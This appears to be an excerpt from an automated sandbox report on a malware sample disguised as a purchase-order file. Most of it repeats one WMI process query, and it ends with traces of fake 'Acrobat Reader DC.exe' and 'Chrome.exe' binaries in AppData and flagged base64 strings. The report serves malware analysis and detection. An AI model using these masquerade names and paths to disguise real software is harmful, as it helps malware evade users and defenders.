                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user~1\AppData\Local\Temp\autB0AA.tmpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00433EE0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,10_2_00433EE0
                        Source: NRHRAS.exe.0.dr, ?????????????/??????????????.csBase64 encoded string: 'NWf0xXxBMNym1T7i6t/rNiVGMNUi3ntP1NYCKx/6SP0jLk+Qbv2/EzhRQifmDLANbovHuNBu7tAqJk7pZtu24A==', 'ozJ8moiZWQPZbcXwvtMmwZ1qbMfRagRa9net3q+Fj6+EXNoM4L1jbbNGObbGq6naklxC0DGON6P6s5BDn/LoxBZCkCgDGhgIyxRw+bPZyNxXEzPtgfb+6uOGRsXIMwf+Q9gDHboo29GRybsUfyg+LaCs1l9/PW49nVwXf9VkINEUSxBTM8S3lpns68sSca7sZ4KWBQ+y0X5kZatAYPgnNq8WdiqwtCMSaqFHPo9rX0bH3Wpl89kyo0rzJb5QY1POxd228gXHMvw6i727dLv4l9Urk/aZPjaEo8vEi569l8m8hqhYVs7xabHzxkoDupAvTBCVZeQjB+h++HvDnssTyA=='
